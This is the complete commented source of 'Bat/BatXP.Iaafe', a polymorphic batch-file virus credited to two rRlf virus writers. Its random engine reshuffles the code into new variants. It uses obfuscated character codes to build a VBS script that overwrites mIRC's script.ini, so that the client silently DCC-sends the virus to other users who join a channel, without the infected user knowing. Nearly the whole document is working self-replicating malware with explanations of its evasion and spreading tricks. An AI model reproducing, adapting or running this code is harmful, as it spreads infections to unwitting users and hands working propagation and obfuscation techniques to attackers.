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- set generation=0
- @echo off % spth-phile %
- cls % spth-phile %
- % spth-phile %set /a generation=%generation%+1
- % spth-phile %if %generation% EQU 5 (
- % spth-phile %echo You are infect with philet0ast3r's and Second Part To Hell's Bat/BatXP.Iaafe!
- % spth-phile %set generation=0
- % spth-phile %)
- % spth-phile %echo set generation=%generation% >poly.bat
- :: Bat/BatXP.Iaafe % spth-phile %
- :: by philet0ast3r[rRlf] & Second Part To Hell[rRlf] % spth-phile %
- :: % spth-phile %
- :: philet0ast3r: Virus idea, name idea and the genial random engine :D % spth-phile %
- :: Second Part To Hell: Included the virus part, encrypt the BAT/VBS part, BatXP workable (workable? +fg+), made this stuff polymporph and the comments % spth-phile %
- :: % spth-phile %
- :: Big thanks goes to Lord Yup for writting the the "Silend DCC SEND"-Article { You'll find it in 29A #6 } % spth-phile %
- :: ------------------------------------------------------------------------------------------------------------------------------------------ % spth-phile %
- :: General Virus Info: % spth-phile %
- :: % spth-phile %
- :: Name of the Virus................................. Bat/BatXP.Iaafe % spth-phile %
- :: Author............................................ philet0ast3r & Second Part To Hell % spth-phile %
- :: Size.............................................. 20.194 byte % spth-phile %
- :: Encrypt........................................... Most of the virus part and something of the random-engine % spth-phile %
- :: Polymorphism...................................... Yes % spth-phile %
- :: (possible variants under WinXP (21*20*19*18*17*16*15*14*13*12*11*10*9*8*7*6*5*4*3*2) = 51090942171709440000 = ca. 51 trillion :] ) % spth-phile %
- :: (possible variants under WinME/98/95 (5*4*3*2) =120 ... because doesn't allow more sets) % spth-phile %
- :: Spreading......................................... The virus spreads via mIRC, but not the normal "one-line-mIRC-spreading" way, but % spth-phile %
- :: a much better one. The User won't know, that he's infect. % spth-phile %
- :: Payload........................................... Every 5th generation the virus shows a shourt text % spth-phile %
- :: % spth-phile %
- :: Last words by Second Part To Hell: % spth-phile %
- :: I nearly commited suicide while writing this virus ;), % spth-phile %
- :: because i had to fix more than 1.000.000 bugs in this fuckin' program. % spth-phile %
- :: But I'm sure, i fixed all and now the virus works without mistake. % spth-phile %
- :: % spth-phile %
- :: Last words by philet0ast3r: % spth-phile %
- :: I just want to thank/greet some important persons: % spth-phile %
- :: breathe for helping me getting the idea how a batch random # generator could work % spth-phile %
- :: 3ri5, kathi, ina, janine & phily for being real friends (and more ;) % spth-phile %
- :: Slage Hammer % spth-phile %
- :: alcopaul % spth-phile %
- :: the rest of the rRlf and some other ppl, who know me % spth-phile %
- :: % spth-phile %
- % spth-phile %set generation=
- % spth-phile %set qwxykjsi=set
- % spth-phile %set aaa=A
- %qwxykjsi% fi=if % spth-phile %
- %qwxykjsi% nt=not % spth-phile %
- %qwxykjsi% el=errorlevel % spth-phile %
- %qwxykjsi% ine=%fi% %nt% %el% % spth-phile %
- % spth-phile %set vrsa=rndom
- set oto=goto% spth-phile %
- %qwxykjsi% a=0 % spth-phile %
- set fd=find% spth-phile %
- :: This part makes the set's for the crypt BAT part
- %fd% "spth-phile"<%0>>poly.bat
- :: The virus searches for "spth-phile" in every line of itself an
- :: write this lines to the poly.bat file
- %qwxykjsi% xp=true% spth-phile %
- % spth-phile %if %xp% EQU true goto xptruea
- :: It's a BatXP command, if it's true, the virus goes to the BatXP part
- goto winparta % spth-phile %
- :: Else it goes to the Bat part
- :xptruea % spth-phile %
- % spth-phile %set a=0
- % spth-phile %set b=0
- % spth-phile %set c=0
- % spth-phile %set d=0
- % spth-phile %set e=0
- % spth-phile %set f=0
- % spth-phile %set g=0
- % spth-phile %set h=0
- % spth-phile %set i=0
- % spth-phile %set j=0
- % spth-phile %set k=0
- % spth-phile %set l=0
- % spth-phile %set m=0
- % spth-phile %set n=0
- % spth-phile %set o=0
- % spth-phile %set p=0
- % spth-phile %set q=0
- % spth-phile %set r=0
- % spth-phile %set s=0
- % spth-phile %set t=0
- % spth-phile %set u=0
- :: This set's are for the poly engine, because the variables can't be nothing
- :: in an if-part
- :start0 % spth-phile %
- % spth-phile %set aa=0
- :: aa, the main poly-engine variable is zero
- :start1 % spth-phile %
- if %aa% EQU 5 goto endpoly % spth-phile %
- %qwxykjsi% /a aa=%aa%+1 % spth-phile %
- :: aa is aa+1
- :start2 % spth-phile %
- ver|time|%fd% ",1">nul % spth-phile %
- :: Searching after "1" in the current time
- %ine% 1 %qwxykjsi% %vrsa%%aa%=1% spth-phile %
- :: If there is no errorlevel, that means, if the searching number in the time
- :: is 1, the variable %vrsa%(random)%aa%(changes, but at first it's 1) is 1!
- %ine% 1 %oto% start1 % spth-phile %
- :: Goto start
- ver|time|%fd% ",2">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=2% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- :: Ones more the same
- ver|time|%fd% ",3">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=3% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- ver|time|%fd% ",4">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=4% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- ver|time|%fd% ",5">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=5% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- ver|time|%fd% ",6">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=6% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- ver|time|%fd% ",7">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=7% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- ver|time|%fd% ",8">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=8% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- ver|time|%fd% ",9">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=9% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- ver|time|%fd% ",0">nul % spth-phile %
- %ine% 1 %qwxykjsi% %vrsa%%aa%=10% spth-phile %
- %ine% 1 %oto% start1 % spth-phile %
- goto start2 % spth-phile %
- :endpoly % spth-phile %
- % spth-phile %if %a% NEQ 1 (if %rndom1% EQU 1 (
- % spth-phile %find "%aaa%AAA" <%0 >>poly.bat
- % spth-phile %set a=1
- % spth-phile %))
- :: The last 4 lines are one if-part.
- :: If a <> 1 AND if %random1% (you know: %vrsa%%aa%) is 1 then seaching
- :: after "BBBB" in the whole code, and write it to poly.bat. And changing
- :: the "a" to 1! So this part of the code won't write ones more to the poly.bat
- % spth-phile %if %b% NEQ 1 (if %rndom1% EQU 2 (
- % spth-phile %find "%aaa%BBB" <%0 >>poly.bat
- % spth-phile %set b=1
- % spth-phile %))
- :: The same
- % spth-phile %if %c% NEQ 1 (if %rndom1% EQU 3 (
- % spth-phile %find "%aaa%CCC" <%0 >>poly.bat
- % spth-phile %set c=1
- % spth-phile %))
- % spth-phile %if %d% NEQ 1 (if %rndom1% EQU 4 (
- % spth-phile %find "%aaa%DDD" <%0 >>poly.bat
- % spth-phile %set d=1
- % spth-phile %))
- % spth-phile %if %e% NEQ 1 (if %rndom2% EQU 1 (
- % spth-phile %find "%aaa%EEE" <%0 >>poly.bat
- % spth-phile %set e=1
- % spth-phile %))
- % spth-phile %if %f% NEQ 1 (if %rndom2% EQU 2 (
- % spth-phile %find "%aaa%FFF" <%0 >>poly.bat
- % spth-phile %set f=1
- % spth-phile %))
- % spth-phile %if %g% NEQ 1 (if %rndom2% EQU 3 (
- % spth-phile %find "%aaa%GGG" <%0 >>poly.bat
- % spth-phile %set g=1
- % spth-phile %))
- % spth-phile %if %h% NEQ 1 (if %rndom2% EQU 4 (
- % spth-phile %find "%aaa%HHH" <%0 >>poly.bat
- % spth-phile %set h=1
- % spth-phile %))
- % spth-phile %if %i% NEQ 1 (if %rndom3% EQU 1 (
- % spth-phile %find "%aaa%III" <%0 >>poly.bat
- % spth-phile %set i=1
- % spth-phile %))
- % spth-phile %if %j% NEQ 1 (if %rndom3% EQU 2 (
- % spth-phile %find "%aaa%JJJ" <%0 >>poly.bat
- % spth-phile %set j=1
- % spth-phile %))
- % spth-phile %if %k% NEQ 1 (if %rndom3% EQU 3 (
- % spth-phile %find "%aaa%KKK" <%0 >>poly.bat
- % spth-phile %set k=1
- % spth-phile %))
- % spth-phile %if %l% NEQ 1 (if %rndom3% EQU 4 (
- % spth-phile %find "%aaa%LLL" <%0 >>poly.bat
- % spth-phile %set l=1
- % spth-phile %))
- % spth-phile %if %m% NEQ 1 (if %rndom4% EQU 1 (
- % spth-phile %find "%aaa%MMM" <%0 >>poly.bat
- % spth-phile %set m=1
- % spth-phile %))
- % spth-phile %if %n% NEQ 1 (if %rndom4% EQU 2 (
- % spth-phile %find "%aaa%NNN" <%0 >>poly.bat
- % spth-phile %set n=1
- % spth-phile %))
- % spth-phile %if %o% NEQ 1 (if %rndom4% EQU 3 (
- % spth-phile %find "%aaa%OOO" <%0 >>poly.bat
- % spth-phile %set o=1
- % spth-phile %))
- % spth-phile %if %p% NEQ 1 (if %rndom4% EQU 4 (
- % spth-phile %find "%aaa%PPP" <%0 >>poly.bat
- % spth-phile %set p=1
- % spth-phile %))
- % spth-phile %if %q% NEQ 1 (if %rndom5% EQU 1 (
- % spth-phile %find "%aaa%QQQ" <%0 >>poly.bat
- % spth-phile %set q=1
- % spth-phile %))
- % spth-phile %if %r% NEQ 1 (if %rndom5% EQU 2 (
- % spth-phile %find "%aaa%RRR" <%0 >>poly.bat
- % spth-phile %set r=1
- % spth-phile %))
- % spth-phile %if %s% NEQ 1 (if %rndom5% EQU 3 (
- % spth-phile %find "%aaa%SSS" <%0 >>poly.bat
- % spth-phile %set s=1
- % spth-phile %))
- % spth-phile %if %t% NEQ 1 (if %rndom5% EQU 4 (
- % spth-phile %find "%aaa%TTT" <%0 >>poly.bat
- % spth-phile %set t=1
- % spth-phile %))
- % spth-phile %if %u% NEQ 1 (if %rndom5% EQU 5 (
- % spth-phile %find "%aaa%UUU" <%0 >>poly.bat
- % spth-phile %set u=1
- % spth-phile %))
- % spth-phile %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 (
- % spth-phile %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 (
- % spth-phile %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 (
- % spth-phile %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 (
- % spth-phile %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 (
- goto irca % spth-phile %
- % spth-phile %)))))))))))))))))))))
- :: The last 7 lines are one really gigant if-part :)
- :: If every letter from "a" to "u" is 1, then the file goes to the mIRC part.
- goto start0 % spth-phile %
- :: Else it goes to the start0 part (and searches ones more for random-numbers)
- :winparta % spth-phile %
- :: Here you can find the normal Bat. If the OS isn't WinXP/Win2000prof,
- :: the virus will start it's life here.
- set wina=0% spth-phile %
- set winb=0% spth-phile %
- set winc=0% spth-phile %
- set wind=0% spth-phile %
- set wine=0% spth-phile %
- set oto=% spth-phile %
- set qwxykjsi=% spth-phile %
- set nt=% spth-phile %
- set fi=% spth-phile %
- set el=% spth-phile %
- set ine=% spth-phile %
- :: These are some variables for cryption or for the poly-engine
- :startwin2 % spth-phile %
- % spth-phile %if not %wina%==1 goto polyengi
- % spth-phile %if not %winb%==1 goto polyengi
- % spth-phile %if not %winc%==1 goto polyengi
- % spth-phile %if not %wind%==1 goto polyengi
- % spth-phile %if not %wine%==1 goto polyengi
- :: These 5 lines are doing the same as the big 7-lines-if-part in the BatXP!
- goto winirc % spth-phile %
- :polyengi % spth-phile %
- ver|time|find ",1">nul % spth-phile %
- if not errorlevel 1 set randoma=1% spth-phile %
- if not errorlevel 1 goto enpolywin % spth-phile %
- :: You have to know these lines, because I explained it in the BatXP part
- ver|time|find ",2">nul % spth-phile %
- if not errorlevel 1 set randoma=2% spth-phile %
- if not errorlevel 1 goto enpolywin % spth-phile %
- ver|time|find ",3">nul % spth-phile %
- if not errorlevel 1 set randoma=3% spth-phile %
- if not errorlevel 1 goto enpolywin % spth-phile %
- ver|time|find ",4">nul % spth-phile %
- if not errorlevel 1 set randoma=4% spth-phile %
- if not errorlevel 1 goto enpolywin % spth-phile %
- ver|time|find ",5">nul % spth-phile %
- if not errorlevel 1 set randoma=5% spth-phile %
- if not errorlevel 1 goto enpolywin % spth-phile %
- goto startwin2 % spth-phile %
- :enpolywin % spth-phile %
- % spth-phile %if not %wina%==1 if %randoma%==1 goto enapolywin
- % spth-phile %if not %winb%==1 if %randoma%==2 goto enbpolywin
- % spth-phile %if not %winc%==1 if %randoma%==3 goto encpolywin
- % spth-phile %if not %wind%==1 if %randoma%==4 goto endpolywin
- % spth-phile %if not %wine%==1 if %randoma%==5 goto enepolywin
- :: If the variable "wina-e" isn't 1, then if the "randoma" is 1-5,
- :: the virus goes to an other part of the Bat-poly-engine
- goto startwin2 % spth-phile %
- :enapolywin % spth-phile %
- % spth-phile %find "%aaa%BBB"<%0>> poly.bat
- % spth-phile %find "%aaa%AAA"<%0>> poly.bat
- % spth-phile %find "%aaa%KKK"<%0>> poly.bat
- % spth-phile %find "%aaa%DDD"<%0>> poly.bat
- set wina=1% spth-phile %
- :: The virus writes every lines with "ABBB","AAAA","AKKK","ADDD" to the poly-file
- :: and changes the variable "wina" to 1
- % spth-phile %goto startwin2
- :enbpolywin % spth-phile %
- % spth-phile %find "%aaa%EEE"<%0>> poly.bat
- % spth-phile %find "%aaa%LLL"<%0>> poly.bat
- % spth-phile %find "%aaa%GGG"<%0>> poly.bat
- % spth-phile %find "%aaa%HHH"<%0>> poly.bat
- set winb=1% spth-phile %
- % spth-phile %goto startwin2
- :encpolywin % spth-phile %
- % spth-phile %find "%aaa%III"<%0>> poly.bat
- % spth-phile %find "%aaa%JJJ"<%0>> poly.bat
- % spth-phile %find "%aaa%CCC"<%0>> poly.bat
- % spth-phile %find "%aaa%FFF"<%0>> poly.bat
- set winc=1% spth-phile %
- % spth-phile %goto startwin2
- :endpolywin % spth-phile %
- % spth-phile %find "%aaa%NNN"<%0>> poly.bat
- % spth-phile %find "%aaa%MMM"<%0>> poly.bat
- % spth-phile %find "%aaa%PPP"<%0>> poly.bat
- % spth-phile %find "%aaa%OOO"<%0>> poly.bat
- set wind=1% spth-phile %
- % spth-phile %goto startwin2
- :enepolywin % spth-phile %
- % spth-phile %find "%aaa%RRR"<%0>> poly.bat
- % spth-phile %find "%aaa%SSS"<%0>> poly.bat
- % spth-phile %find "%aaa%UUU"<%0>> poly.bat
- % spth-phile %find "%aaa%TTT"<%0>> poly.bat
- % spth-phile %find "%aaa%QQQ"<%0>> poly.bat
- set wine=1% spth-phile %
- % spth-phile %goto startwin2
- :winirc % spth-phile %
- % spth-phile %set wina=
- % spth-phile %set winb=
- % spth-phile %set winc=
- % spth-phile %set wind=
- % spth-phile %set wine=
- % spth-phile %set aaa=
- % spth-phile %set randoma=
- :: All variables used in the poly-engine are deleted
- :irca % AAAA %
- if exist C:\mirc\script.ini set mir=C:\mirc% AAAA %
- echo %mir%
- if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA %
- if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA %
- if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA %
- goto ircb% AAAA %
- :ircb % ABBB %
- set mirc=%mir%\script.ini% ABBB %
- set vs=chr(% ABBB %
- goto ircc% ABBB %
- :ircc % ACCC %
- set wc=echo file.writeline% ACCC %
- goto ircd% ACCC %
- :ircd % ADDD %
- echo dim fso, file > irc.vbs% ADDD %
- echo set fso = createobject("scripting.filesystemobject") >>irc.vbs% ADDD %
- echo set file = fso.createtextfile ("%mir%\script.ini", true)>>irc.vbs% ADDD %
- goto irce% ADDD %
- :irce % AEEE %
- %wc% " on 1:st" + %vs%97) + "rt: { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "filee %mir%\name.b" + %vs%97) + "t }">>irc.vbs% AEEE %
- %wc% " on 1:join:#: { ">>irc.vbs% AEEE %
- %wc% " .if (" + %vs%36) + "nick != " + %vs%36) + "me " + %vs%38) + "" + %vs%38) + " " + %vs%37) + "old != " + %vs%36) + "nick) {">>irc.vbs% AEEE %
- goto ircf% AEEE %
- :ircf % AFFF %
- %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "old " + %vs%36) + "nick">>irc.vbs% AFFF %
- %wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,100000) 1 5 ." + %vs%36) + "check_him( " + %vs%36) + "nick , " + %vs%36) + "ch" + %vs%97) + "n )">>irc.vbs% AFFF %
- goto ircg% AFFF %
- :ircg % AGGG %
- %wc% " } ">>irc.vbs% AGGG %
- %wc% " }">>irc.vbs% AGGG %
- %wc% " " + %vs%97) + "li" + %vs%97) + "s check_him {">>irc.vbs% AGGG %
- goto irch% AGGG %
- :irch % AHHH %
- %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) ">>irc.vbs% AHHH %
- %wc% " .while (" + %vs%36) + "portfree(" + %vs%37) + "port) == " + %vs%36) + "f" + %vs%97) + "lse) { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) }">>irc.vbs% AHHH %
- goto irci% AHHH %
- :irci % AIII %
- %wc% " .%fi% (" + %vs%36) + "1 !isop " + %vs%36) + "2) { ">>irc.vbs% AIII %
- %wc% " .%nt%ice " + %vs%36) + "1 :DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " teletubies ( " + %vs%36) + "+ " + %vs%36) + "ip " + %vs%36) + "+ ) ">>irc.vbs% AIII %
- goto ircj% AIII %
- :ircj % AJJJ %
- %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,99999)">>irc.vbs% AJJJ %
- %wc% " .msg " + %vs%36) + "1 DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " " + %vs%37) + "filee " + %vs%36) + "longip(" + %vs%36) + "ip) " + %vs%37) + "port " + %vs%36) + "file(" + %vs%37) + "filee).size " + %vs%36) + "+ ">>irc.vbs% AJJJ %
- %wc% " .socklisten " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%37) + "port">>irc.vbs% AJJJ %
- goto irck% AJJJ %
- :irck % AKKK %
- %wc% " .timers off">>irc.vbs% AKKK %
- %wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,99999) 0 10 .cloze">>irc.vbs% AKKK %
- %wc% " } ">>irc.vbs% AKKK %
- goto ircl% AKKK %
- :ircl % ALLL %
- %wc% " }">>irc.vbs% ALLL %
- %wc% " on 1:socklisten:" + %vs%37) + "sock_n" + %vs%97) + "me: {">>irc.vbs% ALLL %
- goto ircm% ALLL %
- :ircm % AMMM %
- %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "client_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,9999999)">>irc.vbs% AMMM %
- %wc% " .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me">>irc.vbs% AMMM %
- goto ircn% AMMM %
- :ircn % ANNN %
- %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "l 0">>irc.vbs% ANNN %
- %wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs % ANNN %
- goto irco% ANNN %
- :irco % AOOO %
- %wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% AOOO %
- %wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% AOOO %
- goto ircp% AOOO %
- :ircp % APPP %
- %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 0">>irc.vbs% APPP %
- %wc% " }">>irc.vbs% APPP %
- %wc% " on 1:sockre" + %vs%97) + "d:" + %vs%37) + "client_n" + %vs%97) + "me: {">>irc.vbs% APPP %
- goto ircq % APPP %
- :ircq % AQQQ %
- %wc% " .%fi% (" + %vs%37) + "l >= " + %vs%36) + "file(" + %vs%37) + "filee).size) {">>irc.vbs% AQQQ %
- %wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 1">>irc.vbs% AQQQ %
- goto ircr% AQQQ %
- :ircr % ARRR %
- %wc% " .sockclose " + %vs%37) + "client_n" + %vs%97) + "me">>irc.vbs% ARRR %
- %wc% " .h" + %vs%97) + "lt">>irc.vbs% ARRR %
- %wc% " } .else {">>irc.vbs% ARRR %
- goto ircs% ARRR %
- :ircs % ASSS %
- %wc% " .%fi% (" + %vs%37) + "end != 1) {">>irc.vbs% ASSS %
- %wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs% ASSS %
- goto irct% ASSS %
- :irct % ATTT %
- %wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% ATTT %
- %wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% ATTT %
- %wc% " } } }">>irc.vbs% ATTT %
- goto ircu% ATTT %
- :ircu % AUUU %
- %wc% " " + %vs%97) + "li" + %vs%97) + "s cloze { .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me } ">>irc.vbs% AUUU %
- echo file.Close >>irc.vbs% AUUU %
- cscript irc.vbs% AUUU %
- cls% AUUU %
- goto eirc% AUUU %
- :: This is the whole virus part
- :: It spreads via mIRC, and is mostly encrypt
- :eirc % phile-spth %
- del irc.vbs % phile-spth %
- find "phile-spth"<%0>>poly.bat
- copy poly.bat %mir%\name.bat % phile-spth %
- del poly.bat % phile-spth %
- cls % phile-spth %
- :: Last but not least, the virus searchs for "phile-spth" in the viruscode,
- :: And write it to the poly.bat! Then it copies the poly.bat to the mIRC-dir
- :: and deletes the irc-vbs and the poly.bat!
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